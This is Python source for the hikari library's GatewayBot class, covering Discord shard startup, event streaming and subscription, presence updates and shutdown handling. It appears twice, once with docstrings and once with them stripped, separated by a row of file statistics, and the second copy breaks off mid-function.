self._rest.start()
self._voice.start()
self._closing_event = asyncio.Event()
self._is_alive = True
if check_for_updates:
asyncio.create_task(
ux.check_for_updates(self._http_settings, self._proxy_settings),
name="check for package updates",
)
requirements = await self._rest.fetch_gateway_bot_info()
await self._event_manager.dispatch(self._event_factory.deserialize_starting_event())
if shard_count is None:
shard_count = requirements.shard_count
if shard_ids is None:
shard_ids = set(range(shard_count))
if requirements.session_start_limit.remaining < len(shard_ids) and not ignore_session_start_limit:
_LOGGER.critical(
"would have started %s session%s, but you only have %s session%s remaining until %s. Starting more "
"sessions than you are allowed to start may result in your token being reset. To skip this message, "
"use bot.run(..., ignore_session_start_limit=True) or bot.start(..., ignore_session_start_limit=True)",
len(shard_ids),
"s" if len(shard_ids) != 1 else "",
requirements.session_start_limit.remaining,
"s" if requirements.session_start_limit.remaining != 1 else "",
requirements.session_start_limit.reset_at,
)
raise errors.GatewayError("Attempted to start more sessions than were allowed in the given time-window")
_LOGGER.info(
"you can start %s session%s before the next window which starts at %s; planning to start %s session%s... ",
requirements.session_start_limit.remaining,
"s" if requirements.session_start_limit.remaining != 1 else "",
requirements.session_start_limit.reset_at,
len(shard_ids),
"s" if len(shard_ids) != 1 else "",
)
for window_start in range(0, shard_count, requirements.session_start_limit.max_concurrency):
window = [
candidate_shard_id
for candidate_shard_id in range(
window_start, window_start + requirements.session_start_limit.max_concurrency
)
if candidate_shard_id in shard_ids
]
if not window:
continue
if self._shards:
close_waiter = asyncio.create_task(self._closing_event.wait())
shard_joiners = [s.join() for s in self._shards.values()]
try:
# Attempt to wait for all started shards, for 5 seconds, along with the close
# waiter.
# If the close flag is set (i.e. user invoked bot.close), or one or more shards
# die in this time, we shut down immediately.
# If we time out, the joining tasks get discarded and we spin up the next
# block of shards, if applicable.
_LOGGER.info("the next startup window is in 5 seconds, please wait...")
await aio.first_completed(aio.all_of(*shard_joiners, timeout=5), close_waiter)
if not close_waiter.cancelled():
_LOGGER.info("requested to shut down during startup of shards")
else:
_LOGGER.critical("one or more shards shut down unexpectedly during bot startup")
return
except asyncio.TimeoutError:
# If any shards stopped silently, we should close.
if any(not s.is_alive for s in self._shards.values()):
_LOGGER.warning("one of the shards has been manually shut down (no error), will now shut down")
await self._close()
return
# new window starts.
except Exception as ex:
_LOGGER.critical("an exception occurred in one of the started shards during bot startup: %r", ex)
raise
await aio.all_of(
*(
self._start_one_shard(
activity=activity,
afk=afk,
idle_since=idle_since,
status=status,
large_threshold=large_threshold,
shard_id=candidate_shard_id,
shard_count=shard_count,
url=requirements.url,
closing_event=self._closing_event,
)
for candidate_shard_id in window
if candidate_shard_id in shard_ids
)
)
await self._event_manager.dispatch(self._event_factory.deserialize_started_event())
_LOGGER.info("started successfully in approx %.2f seconds", time.monotonic() - start_time)
def stream(
self,
event_type: typing.Type[event_manager_.EventT_co],
/,
timeout: typing.Union[float, int, None],
limit: typing.Optional[int] = None,
) -> event_manager_.EventStream[event_manager_.EventT_co]:
"""Return a stream iterator for the given event and sub-events.
Parameters
----------
event_type : typing.Type[hikari.events.base_events.Event]
The event type to listen for. This will listen for subclasses of
this type additionally.
timeout : typing.Optional[builtins.int, builtins.float]
How long this streamer should wait for the next event before
ending the iteration. If `builtins.None` then this will continue
until explicitly broken from.
limit : typing.Optional[builtins.int]
The limit for how many events this should queue at one time before
dropping extra incoming events, leave this as `builtins.None` for
the cache size to be unlimited.
Returns
-------
EventStream[hikari.events.base_events.Event]
The async iterator to handle streamed events. This must be started
with `with stream:` or `stream.open()` before
asynchronously iterating over it.
!!! warning
If you use `stream.open()` to start the stream then you must
also close it with `stream.close()` otherwise it may queue
events in memory indefinitely.
Examples
--------
```py
with bot.stream(events.ReactionAddEvent, timeout=30).filter(("message_id", message.id)) as stream:
async for user_id in stream.map("user_id").limit(50):
...
```
or using `open()` and `close()`
```py
stream = bot.stream(events.ReactionAddEvent, timeout=30).filter(("message_id", message.id))
stream.open()
async for user_id in stream.map("user_id").limit(50)
...
stream.close()
```
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
self._check_if_alive()
return self._event_manager.stream(event_type, timeout=timeout, limit=limit)
def subscribe(self, event_type: typing.Type[typing.Any], callback: event_manager_.CallbackT[typing.Any]) -> None:
"""Subscribe a given callback to a given event type.
Parameters
----------
event_type : typing.Type[T]
The event type to listen for. This will also listen for any
subclasses of the given type.
`T` must be a subclass of `hikari.events.base_events.Event`.
callback
Must be a coroutine function to invoke. This should
consume an instance of the given event, or an instance of a valid
subclass if one exists. Any result is discarded.
Example
-------
The following demonstrates subscribing a callback to message creation
events.
```py
from hikari.events.messages import MessageCreateEvent
async def on_message(event):
...
bot.subscribe(MessageCreateEvent, on_message)
```
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
self._event_manager.subscribe(event_type, callback)
def unsubscribe(self, event_type: typing.Type[typing.Any], callback: event_manager_.CallbackT[typing.Any]) -> None:
"""Unsubscribe a given callback from a given event type, if present.
Parameters
----------
event_type : typing.Type[T]
The event type to unsubscribe from. This must be the same exact
type as was originally subscribed with to be removed correctly.
`T` must derive from `hikari.events.base_events.Event`.
callback
The callback to unsubscribe.
Example
-------
The following demonstrates unsubscribing a callback from a message
creation event.
```py
from hikari.events.messages import MessageCreateEvent
async def on_message(event):
...
bot.unsubscribe(MessageCreateEvent, on_message)
```
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Wait_for: `hikari.impl.bot.GatewayBot.wait_for`
"""
self._event_manager.unsubscribe(event_type, callback)
async def wait_for(
self,
event_type: typing.Type[event_manager_.EventT_co],
/,
timeout: typing.Union[float, int, None],
predicate: typing.Optional[event_manager_.PredicateT[event_manager_.EventT_co]] = None,
) -> event_manager_.EventT_co:
"""Wait for a given event to occur once, then return the event.
Parameters
----------
event_type : typing.Type[hikari.events.base_events.Event]
The event type to listen for. This will listen for subclasses of
this type additionally.
predicate
A function taking the event as the single parameter.
This should return `builtins.True` if the event is one you want to
return, or `builtins.False` if the event should not be returned.
If left as `None` (the default), then the first matching event type
that the bot receives (or any subtype) will be the one returned.
!!! warning
Async predicates are not supported.
timeout : typing.Union[builtins.float, builtins.int, builtins.None]
The amount of time to wait before raising an `asyncio.TimeoutError`
and giving up instead. This is measured in seconds. If
`builtins.None`, then no timeout will be waited for (no timeout can
result in "leaking" of coroutines that never complete if called in
an uncontrolled way, so is not recommended).
Returns
-------
hikari.events.base_events.Event
The event that was provided.
Raises
------
asyncio.TimeoutError
If the timeout is not `builtins.None` and is reached before an
event is received that the predicate returns `builtins.True` for.
See Also
--------
Dispatch: `hikari.impl.bot.GatewayBot.dispatch`
Listen: `hikari.impl.bot.GatewayBot.listen`
Stream: `hikari.impl.bot.GatewayBot.stream`
Subscribe: `hikari.impl.bot.GatewayBot.subscribe`
Unsubscribe: `hikari.impl.bot.GatewayBot.unsubscribe`
"""
self._check_if_alive()
return await self._event_manager.wait_for(event_type, timeout=timeout, predicate=predicate)
def _get_shard(self, guild: snowflakes.SnowflakeishOr[guilds.PartialGuild]) -> gateway_shard.GatewayShard:
guild = snowflakes.Snowflake(guild)
if shard := self._shards.get(snowflakes.calculate_shard_id(self.shard_count, guild)):
return shard
raise RuntimeError(f"Guild {guild} isn't covered by any of the shards in this client")
async def update_presence(
self,
*,
status: undefined.UndefinedOr[presences.Status] = undefined.UNDEFINED,
idle_since: undefined.UndefinedNoneOr[datetime.datetime] = undefined.UNDEFINED,
activity: undefined.UndefinedNoneOr[presences.Activity] = undefined.UNDEFINED,
afk: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
_validate_activity(activity)
coros = [
s.update_presence(status=status, activity=activity, idle_since=idle_since, afk=afk)
for s in self._shards.values()
]
await aio.all_of(*coros)
async def update_voice_state(
self,
guild: snowflakes.SnowflakeishOr[guilds.PartialGuild],
channel: typing.Optional[snowflakes.SnowflakeishOr[channels.GuildVoiceChannel]],
*,
self_mute: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
self_deaf: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
shard = self._get_shard(guild)
await shard.update_voice_state(guild=guild, channel=channel, self_mute=self_mute, self_deaf=self_deaf)
async def request_guild_members(
self,
guild: snowflakes.SnowflakeishOr[guilds.PartialGuild],
*,
include_presences: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
query: str = "",
limit: int = 0,
users: undefined.UndefinedOr[snowflakes.SnowflakeishSequence[users_.User]] = undefined.UNDEFINED,
nonce: undefined.UndefinedOr[str] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
shard = self._get_shard(guild)
await shard.request_guild_members(
guild=guild, include_presences=include_presences, query=query, limit=limit, users=users, nonce=nonce
)
async def _set_close_flag(self, signame: str, signum: int) -> None:
# This needs to be a coroutine, as the closing event is not threadsafe, so we have no way to set this
# from a Unix system call handler if we are running on a thread that isn't the main application thread
# without getting undefined behaviour. We do however have `asyncio.run_coroutine_threadsafe` which can
# run a coroutine function on the event loop from a completely different thread, so this is the safest
# solution.
_LOGGER.debug("received interrupt %s (%s), will start shutting down shortly", signame, signum)
await self._close()
async def _start_one_shard(
self,
activity: typing.Optional[presences.Activity],
afk: bool,
idle_since: typing.Optional[datetime.datetime],
status: presences.Status,
large_threshold: int,
shard_id: int,
shard_count: int,
url: str,
closing_event: asyncio.Event,
) -> shard_impl.GatewayShardImpl:
new_shard = shard_impl.GatewayShardImpl(
http_settings=self._http_settings,
proxy_settings=self._proxy_settings,
event_manager=self._event_manager,
event_factory=self._event_factory,
intents=self._intents,
initial_activity=activity,
initial_is_afk=afk,
initial_idle_since=idle_since,
initial_status=status,
large_threshold=large_threshold,
shard_id=shard_id,
shard_count=shard_count,
token=self._token,
url=url,
)
self._shards[shard_id] = new_shard
start = time.monotonic()
await aio.first_completed(new_shard.start(), closing_event.wait())
end = time.monotonic()
if new_shard.is_alive:
_LOGGER.debug("shard %s started successfully in %.1fms", shard_id, (end - start) * 1_000)
return new_shard
raise errors.GatewayError(f"shard {shard_id} shut down immediately when starting")
| 42.539237
| 120
| 0.639413
|
from __future__ import annotations
__all__: typing.List[str] = ["GatewayBot"]
import asyncio
import datetime
import logging
import math
import signal
import sys
import threading
import traceback
import types
import typing
import warnings
from hikari import applications
from hikari import errors
from hikari import intents as intents_
from hikari import presences
from hikari import snowflakes
from hikari import traits
from hikari import undefined
from hikari.impl import cache as cache_impl
from hikari.impl import config as config_impl
from hikari.impl import entity_factory as entity_factory_impl
from hikari.impl import event_factory as event_factory_impl
from hikari.impl import event_manager as event_manager_impl
from hikari.impl import rest as rest_impl
from hikari.impl import shard as shard_impl
from hikari.impl import voice as voice_impl
from hikari.internal import aio
from hikari.internal import time
from hikari.internal import ux
if typing.TYPE_CHECKING:
import concurrent.futures
from hikari import channels
from hikari import guilds
from hikari import users as users_
from hikari.api import cache as cache_
from hikari.api import entity_factory as entity_factory_
from hikari.api import event_factory as event_factory_
from hikari.api import event_manager as event_manager_
from hikari.api import rest as rest_
from hikari.api import shard as gateway_shard
from hikari.api import voice as voice_
_LOGGER: typing.Final[logging.Logger] = logging.getLogger("hikari.bot")
async def _gather(coros: typing.Iterator[typing.Awaitable[typing.Any]]) -> None:
# will lead to RuntimeErrors in later versions of python, so this call is
# kept within a coroutine function.
await asyncio.gather(*coros)
def _destroy_loop(loop: asyncio.AbstractEventLoop) -> None:
async def murder(future: asyncio.Future[typing.Any]) -> None:
# These include _GatheringFuture which must be awaited if the children
# throw an asyncio.CancelledError, otherwise it will spam logs with warnings
# about exceptions not being retrieved before GC.
try:
_LOGGER.log(ux.TRACE, "killing %s", future)
future.cancel()
await future
except asyncio.CancelledError:
pass
except Exception as ex:
loop.call_exception_handler(
{
"message": "Future raised unexpected exception after requesting cancellation",
"exception": ex,
"future": future,
}
)
remaining_tasks = [t for t in asyncio.all_tasks(loop) if not t.done()]
if remaining_tasks:
_LOGGER.debug("terminating %s remaining tasks forcefully", len(remaining_tasks))
loop.run_until_complete(_gather((murder(task) for task in remaining_tasks)))
else:
_LOGGER.debug("No remaining tasks exist, good job!")
if sys.version_info >= (3, 9):
_LOGGER.debug("shutting down default executor")
try:
# This seems to raise a NotImplementedError when running with uvloop.
loop.run_until_complete(loop.shutdown_default_executor())
except NotImplementedError:
pass
_LOGGER.debug("shutting down asyncgens")
loop.run_until_complete(loop.shutdown_asyncgens())
_LOGGER.debug("closing event loop")
loop.close()
# Closed loops cannot be re-used so it should also be un-set.
asyncio.set_event_loop(None)
def _validate_activity(activity: undefined.UndefinedNoneOr[presences.Activity]) -> None:
# This seems to cause confusion for a lot of people, so lets add some warnings into the mix.
if activity is undefined.UNDEFINED or activity is None:
return
# If you ever change where this is called from, make sure to check the stacklevels are correct
# or the code preview in the warning will be wrong...
if activity.type is presences.ActivityType.CUSTOM:
warnings.warn(
"The CUSTOM activity type is not supported by bots at the time of writing, and may therefore not have "
"any effect if used.",
category=errors.HikariWarning,
stacklevel=3,
)
elif activity.type is presences.ActivityType.STREAMING and activity.url is None:
warnings.warn(
"The STREAMING activity type requires a 'url' parameter pointing to a valid Twitch or YouTube video "
"URL to be specified on the activity for the presence update to have any effect.",
category=errors.HikariWarning,
stacklevel=3,
)
class GatewayBot(traits.GatewayBotAware):
__slots__: typing.Sequence[str] = (
"_cache",
"_closing_event",
"_closed_event",
"_entity_factory",
"_event_manager",
"_event_factory",
"_executor",
"_http_settings",
"_intents",
"_is_alive",
"_proxy_settings",
"_rest",
"_shards",
"_token",
"_voice",
"shards",
)
def __init__(
self,
token: str,
*,
allow_color: bool = True,
banner: typing.Optional[str] = "hikari",
executor: typing.Optional[concurrent.futures.Executor] = None,
force_color: bool = False,
cache_settings: typing.Optional[config_impl.CacheSettings] = None,
http_settings: typing.Optional[config_impl.HTTPSettings] = None,
intents: intents_.Intents = intents_.Intents.ALL_UNPRIVILEGED,
logs: typing.Union[None, int, str, typing.Dict[str, typing.Any]] = "INFO",
max_rate_limit: float = 300,
max_retries: int = 3,
proxy_settings: typing.Optional[config_impl.ProxySettings] = None,
rest_url: typing.Optional[str] = None,
) -> None:
# Beautification and logging
ux.init_logging(logs, allow_color, force_color)
self.print_banner(banner, allow_color, force_color)
# Settings and state
self._closing_event: typing.Optional[asyncio.Event] = None
self._closed_event: typing.Optional[asyncio.Event] = None
self._is_alive = False
self._executor = executor
self._http_settings = http_settings if http_settings is not None else config_impl.HTTPSettings()
self._intents = intents
self._proxy_settings = proxy_settings if proxy_settings is not None else config_impl.ProxySettings()
self._token = token.strip()
# Caching
cache_settings = cache_settings if cache_settings is not None else config_impl.CacheSettings()
self._cache = cache_impl.CacheImpl(self, cache_settings)
# Entity creation
self._entity_factory = entity_factory_impl.EntityFactoryImpl(self)
# Event creation
self._event_factory = event_factory_impl.EventFactoryImpl(self)
# Event handling
self._event_manager = event_manager_impl.EventManagerImpl(self._event_factory, self._intents, cache=self._cache)
# Voice subsystem
self._voice = voice_impl.VoiceComponentImpl(self)
# RESTful API.
self._rest = rest_impl.RESTClientImpl(
cache=self._cache,
entity_factory=self._entity_factory,
executor=self._executor,
http_settings=self._http_settings,
max_rate_limit=max_rate_limit,
proxy_settings=self._proxy_settings,
rest_url=rest_url,
max_retries=max_retries,
token=token,
token_type=applications.TokenType.BOT,
)
# We populate these on startup instead, as we need to possibly make some
# HTTP requests to determine what to put in this mapping.
self._shards: typing.Dict[int, gateway_shard.GatewayShard] = {}
self.shards: typing.Mapping[int, gateway_shard.GatewayShard] = types.MappingProxyType(self._shards)
@property
def cache(self) -> cache_.Cache:
return self._cache
@property
def event_manager(self) -> event_manager_.EventManager:
return self._event_manager
@property
def entity_factory(self) -> entity_factory_.EntityFactory:
return self._entity_factory
@property
def event_factory(self) -> event_factory_.EventFactory:
return self._event_factory
@property
def executor(self) -> typing.Optional[concurrent.futures.Executor]:
return self._executor
@property
def heartbeat_latencies(self) -> typing.Mapping[int, float]:
return {s.id: s.heartbeat_latency for s in self._shards.values()}
@property
def heartbeat_latency(self) -> float:
latencies = [s.heartbeat_latency for s in self._shards.values() if not math.isnan(s.heartbeat_latency)]
return sum(latencies) / len(latencies) if latencies else float("nan")
@property
def http_settings(self) -> config_impl.HTTPSettings:
return self._http_settings
@property
def intents(self) -> intents_.Intents:
return self._intents
@property
def proxy_settings(self) -> config_impl.ProxySettings:
return self._proxy_settings
@property
def shard_count(self) -> int:
return next(iter(self._shards.values())).shard_count if self._shards else 0
@property
def voice(self) -> voice_.VoiceComponent:
return self._voice
@property
def rest(self) -> rest_.RESTClient:
return self._rest
@property
def is_alive(self) -> bool:
return self._is_alive
def _check_if_alive(self) -> None:
if not self._is_alive:
raise errors.ComponentStateConflictError("bot is not running so it cannot be interacted with")
def get_me(self) -> typing.Optional[users_.OwnUser]:
return self._cache.get_me()
async def close(self) -> None:
self._check_if_alive()
await self._close()
async def _close(self) -> None:
if self._closed_event: # Closing is in progress from another call, wait for that to complete.
await self._closed_event.wait()
return
if self._closing_event is None: # If closing event is None then this is already closed.
return
_LOGGER.debug("bot requested to shutdown")
self._closed_event = asyncio.Event()
self._closing_event.set()
self._closing_event = None
dispatch_events = self._is_alive
loop = asyncio.get_running_loop()
async def handle(name: str, awaitable: typing.Awaitable[typing.Any]) -> None:
future = asyncio.ensure_future(awaitable)
try:
await future
except Exception as ex:
loop.call_exception_handler(
{
"message": f"{name} raised an exception during shutdown",
"future": future,
"exception": ex,
}
)
if dispatch_events:
await self._event_manager.dispatch(self._event_factory.deserialize_stopping_event())
_LOGGER.log(ux.TRACE, "StoppingEvent dispatch completed, now beginning termination")
calls = [
("rest", self._rest.close()),
("voice handler", self._voice.close()),
*((f"shard {s.id}", s.close()) for s in self._shards.values()),
]
for coro in asyncio.as_completed([handle(*pair) for pair in calls]):
await coro
# Clear out cache and shard map
self._cache.clear()
self._shards.clear()
self._is_alive = False
if dispatch_events:
await self._event_manager.dispatch(self._event_factory.deserialize_stopped_event())
self._closed_event.set()
self._closed_event = None
def dispatch(self, event: event_manager_.EventT_inv) -> asyncio.Future[typing.Any]:
return self._event_manager.dispatch(event)
def get_listeners(
self, event_type: typing.Type[event_manager_.EventT_co], /, *, polymorphic: bool = True
) -> typing.Collection[event_manager_.CallbackT[event_manager_.EventT_co]]:
return self._event_manager.get_listeners(event_type, polymorphic=polymorphic)
async def join(self, until_close: bool = True) -> None:
self._check_if_alive()
awaitables: typing.List[typing.Awaitable[typing.Any]] = [s.join() for s in self._shards.values()]
if until_close and self._closing_event: # If closing event is None then this is already closing.
awaitables.append(self._closing_event.wait())
await aio.first_completed(*awaitables)
def listen(
self, event_type: typing.Optional[typing.Type[event_manager_.EventT_co]] = None
) -> typing.Callable[
[event_manager_.CallbackT[event_manager_.EventT_co]],
event_manager_.CallbackT[event_manager_.EventT_co],
]:
return self._event_manager.listen(event_type)
@staticmethod
def print_banner(
banner: typing.Optional[str],
allow_color: bool,
force_color: bool,
extra_args: typing.Optional[typing.Dict[str, str]] = None,
) -> None:
ux.print_banner(banner, allow_color, force_color, extra_args=extra_args)
def run(
self,
*,
activity: typing.Optional[presences.Activity] = None,
afk: bool = False,
asyncio_debug: typing.Optional[bool] = None,
check_for_updates: bool = True,
close_passed_executor: bool = False,
close_loop: bool = True,
coroutine_tracking_depth: typing.Optional[int] = None,
enable_signal_handlers: typing.Optional[bool] = None,
idle_since: typing.Optional[datetime.datetime] = None,
ignore_session_start_limit: bool = False,
large_threshold: int = 250,
propagate_interrupts: bool = False,
status: presences.Status = presences.Status.ONLINE,
shard_ids: typing.Optional[typing.AbstractSet[int]] = None,
shard_count: typing.Optional[int] = None,
) -> None:
if self._is_alive:
raise errors.ComponentStateConflictError("bot is already running")
if shard_ids is not None and shard_count is None:
raise TypeError("'shard_ids' must be passed with 'shard_count'")
loop = aio.get_or_make_loop()
signals = ("SIGINT", "SIGTERM")
if asyncio_debug:
loop.set_debug(True)
if coroutine_tracking_depth is not None:
try:
# Provisionally defined in CPython, may be removed without notice.
sys.set_coroutine_origin_tracking_depth(coroutine_tracking_depth)
except AttributeError:
_LOGGER.log(ux.TRACE, "cannot set coroutine tracking depth for sys, no functionality exists for this")
# Throwing this in the handler will lead to lots of fun OS specific shenanigans. So, lets just
# cache it for later, I guess.
interrupt: typing.Optional[errors.HikariInterrupt] = None
loop_thread_id = threading.get_native_id()
def handle_os_interrupt(signum: int, frame: typing.Optional[types.FrameType]) -> None:
# If we use a POSIX system, then raising an exception in here works perfectly and shuts the loop down
# with an exception, which is good.
# Windows, however, is special on this front. On Windows, the exception is caught by whatever was
# currently running on the event loop at the time, which is annoying for us, as this could be fired into
# the task for an event dispatch, for example, which is a guarded call that is never waited for by design.
# We can't always safely intercept this either, as Windows does not allow us to use asyncio loop
# for a remote few standard C signal types). Thus, the best solution here is to set the close bit
# instead, which will let the bot start to clean itself up as if the user closed it manually via a call
# to `bot.close()`.
nonlocal interrupt
signame = signal.strsignal(signum)
assert signame is not None # Will always be True
interrupt = errors.HikariInterrupt(signum, signame)
# The loop may or may not be running, depending on the state of the application when this occurs.
# Signals on POSIX only occur on the main thread usually, too, so we need to ensure this is
# threadsafe if we want the user's application to still shut down if on a separate thread.
if _LOGGER.isEnabledFor(ux.TRACE):
_LOGGER.log(
ux.TRACE,
"interrupt %s occurred on thread %s, bot on thread %s will be notified to shut down shortly\n"
"Stacktrace for developer sanity:\n%s",
signum,
threading.get_native_id(),
loop_thread_id,
"".join(traceback.format_stack(frame)),
)
asyncio.run_coroutine_threadsafe(self._set_close_flag(signame, signum), loop)
if enable_signal_handlers is None:
enable_signal_handlers = threading.current_thread() is threading.main_thread()
if enable_signal_handlers:
for sig in signals:
try:
signum = getattr(signal, sig)
signal.signal(signum, handle_os_interrupt)
except AttributeError:
_LOGGER.log(ux.TRACE, "signal %s is not implemented on your platform", sig)
try:
loop.run_until_complete(
self.start(
activity=activity,
afk=afk,
check_for_updates=check_for_updates,
idle_since=idle_since,
ignore_session_start_limit=ignore_session_start_limit,
large_threshold=large_threshold,
shard_ids=shard_ids,
shard_count=shard_count,
status=status,
)
)
loop.run_until_complete(self.join())
finally:
try:
loop.run_until_complete(self._close())
if close_passed_executor and self._executor is not None:
_LOGGER.debug("shutting down executor %s", self._executor)
self._executor.shutdown(wait=True)
self._executor = None
finally:
if enable_signal_handlers:
for sig in signals:
try:
signum = getattr(signal, sig)
signal.signal(signum, signal.SIG_DFL)
except AttributeError:
pass
if close_loop:
_destroy_loop(loop)
_LOGGER.info("successfully terminated")
if propagate_interrupts and interrupt is not None:
raise interrupt
async def start(
self,
*,
activity: typing.Optional[presences.Activity] = None,
afk: bool = False,
check_for_updates: bool = True,
idle_since: typing.Optional[datetime.datetime] = None,
ignore_session_start_limit: bool = False,
large_threshold: int = 250,
shard_ids: typing.Optional[typing.AbstractSet[int]] = None,
shard_count: typing.Optional[int] = None,
status: presences.Status = presences.Status.ONLINE,
) -> None:
if self._is_alive:
raise errors.ComponentStateConflictError("bot is already running")
if shard_ids is not None and shard_count is None:
raise TypeError("'shard_ids' must be passed with 'shard_count'")
_validate_activity(activity)
start_time = time.monotonic()
self._rest.start()
self._voice.start()
self._closing_event = asyncio.Event()
self._is_alive = True
if check_for_updates:
asyncio.create_task(
ux.check_for_updates(self._http_settings, self._proxy_settings),
name="check for package updates",
)
requirements = await self._rest.fetch_gateway_bot_info()
await self._event_manager.dispatch(self._event_factory.deserialize_starting_event())
if shard_count is None:
shard_count = requirements.shard_count
if shard_ids is None:
shard_ids = set(range(shard_count))
if requirements.session_start_limit.remaining < len(shard_ids) and not ignore_session_start_limit:
_LOGGER.critical(
"would have started %s session%s, but you only have %s session%s remaining until %s. Starting more "
"sessions than you are allowed to start may result in your token being reset. To skip this message, "
"use bot.run(..., ignore_session_start_limit=True) or bot.start(..., ignore_session_start_limit=True)",
len(shard_ids),
"s" if len(shard_ids) != 1 else "",
requirements.session_start_limit.remaining,
"s" if requirements.session_start_limit.remaining != 1 else "",
requirements.session_start_limit.reset_at,
)
raise errors.GatewayError("Attempted to start more sessions than were allowed in the given time-window")
_LOGGER.info(
"you can start %s session%s before the next window which starts at %s; planning to start %s session%s... ",
requirements.session_start_limit.remaining,
"s" if requirements.session_start_limit.remaining != 1 else "",
requirements.session_start_limit.reset_at,
len(shard_ids),
"s" if len(shard_ids) != 1 else "",
)
for window_start in range(0, shard_count, requirements.session_start_limit.max_concurrency):
window = [
candidate_shard_id
for candidate_shard_id in range(
window_start, window_start + requirements.session_start_limit.max_concurrency
)
if candidate_shard_id in shard_ids
]
if not window:
continue
if self._shards:
close_waiter = asyncio.create_task(self._closing_event.wait())
shard_joiners = [s.join() for s in self._shards.values()]
try:
_LOGGER.info("the next startup window is in 5 seconds, please wait...")
await aio.first_completed(aio.all_of(*shard_joiners, timeout=5), close_waiter)
if not close_waiter.cancelled():
_LOGGER.info("requested to shut down during startup of shards")
else:
_LOGGER.critical("one or more shards shut down unexpectedly during bot startup")
return
except asyncio.TimeoutError:
if any(not s.is_alive for s in self._shards.values()):
_LOGGER.warning("one of the shards has been manually shut down (no error), will now shut down")
await self._close()
return
except Exception as ex:
_LOGGER.critical("an exception occurred in one of the started shards during bot startup: %r", ex)
raise
await aio.all_of(
*(
self._start_one_shard(
activity=activity,
afk=afk,
idle_since=idle_since,
status=status,
large_threshold=large_threshold,
shard_id=candidate_shard_id,
shard_count=shard_count,
url=requirements.url,
closing_event=self._closing_event,
)
for candidate_shard_id in window
if candidate_shard_id in shard_ids
)
)
await self._event_manager.dispatch(self._event_factory.deserialize_started_event())
_LOGGER.info("started successfully in approx %.2f seconds", time.monotonic() - start_time)
def stream(
self,
event_type: typing.Type[event_manager_.EventT_co],
/,
timeout: typing.Union[float, int, None],
limit: typing.Optional[int] = None,
) -> event_manager_.EventStream[event_manager_.EventT_co]:
self._check_if_alive()
return self._event_manager.stream(event_type, timeout=timeout, limit=limit)
def subscribe(self, event_type: typing.Type[typing.Any], callback: event_manager_.CallbackT[typing.Any]) -> None:
self._event_manager.subscribe(event_type, callback)
def unsubscribe(self, event_type: typing.Type[typing.Any], callback: event_manager_.CallbackT[typing.Any]) -> None:
self._event_manager.unsubscribe(event_type, callback)
async def wait_for(
self,
event_type: typing.Type[event_manager_.EventT_co],
/,
timeout: typing.Union[float, int, None],
predicate: typing.Optional[event_manager_.PredicateT[event_manager_.EventT_co]] = None,
) -> event_manager_.EventT_co:
self._check_if_alive()
return await self._event_manager.wait_for(event_type, timeout=timeout, predicate=predicate)
def _get_shard(self, guild: snowflakes.SnowflakeishOr[guilds.PartialGuild]) -> gateway_shard.GatewayShard:
guild = snowflakes.Snowflake(guild)
if shard := self._shards.get(snowflakes.calculate_shard_id(self.shard_count, guild)):
return shard
raise RuntimeError(f"Guild {guild} isn't covered by any of the shards in this client")
async def update_presence(
self,
*,
status: undefined.UndefinedOr[presences.Status] = undefined.UNDEFINED,
idle_since: undefined.UndefinedNoneOr[datetime.datetime] = undefined.UNDEFINED,
activity: undefined.UndefinedNoneOr[presences.Activity] = undefined.UNDEFINED,
afk: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
_validate_activity(activity)
coros = [
s.update_presence(status=status, activity=activity, idle_since=idle_since, afk=afk)
for s in self._shards.values()
]
await aio.all_of(*coros)
async def update_voice_state(
self,
guild: snowflakes.SnowflakeishOr[guilds.PartialGuild],
channel: typing.Optional[snowflakes.SnowflakeishOr[channels.GuildVoiceChannel]],
*,
self_mute: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
self_deaf: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
shard = self._get_shard(guild)
await shard.update_voice_state(guild=guild, channel=channel, self_mute=self_mute, self_deaf=self_deaf)
async def request_guild_members(
self,
guild: snowflakes.SnowflakeishOr[guilds.PartialGuild],
*,
include_presences: undefined.UndefinedOr[bool] = undefined.UNDEFINED,
query: str = "",
limit: int = 0,
users: undefined.UndefinedOr[snowflakes.SnowflakeishSequence[users_.User]] = undefined.UNDEFINED,
nonce: undefined.UndefinedOr[str] = undefined.UNDEFINED,
) -> None:
self._check_if_alive()
shard = self._get_shard(guild)
await shard.request_guild_members(
guild=guild, include_presences=include_presences, query=query, limit=limit, users=users, nonce=nonce
)
async def _set_close_flag(self, signame: str, signum: int) -> None:
# This needs to be a coroutine, as the closing event is not threadsafe, so we have no way to set this
# from a Unix system call handler if we are running on a thread that isn't the main application thread
_LOGGER.debug("received interrupt %s (%s), will start shutting down shortly", signame, signum)
await self._close()
async def _start_one_shard(
self,
activity: typing.Optional[presences.Activity],
afk: bool,
idle_since: typing.Optional[datetime.datetime],
status: presences.Status,
large_threshold: int,
shard_id: int,
shard_count: int,
url: str,
closing_event: asyncio.Event,
) -> shard_impl.GatewayShardImpl:
new_shard = shard_impl.GatewayShardImpl(
http_settings=self._http_settings,
proxy_settings=self._proxy_settings,
event_manager=self._event_manager,
event_factory=self._event_factory,
intents=self._intents,
initial_activity=activity,
initial_is_afk=afk,
initial_idle_since=idle_since,
initial_status=status,
large_threshold=large_threshold,
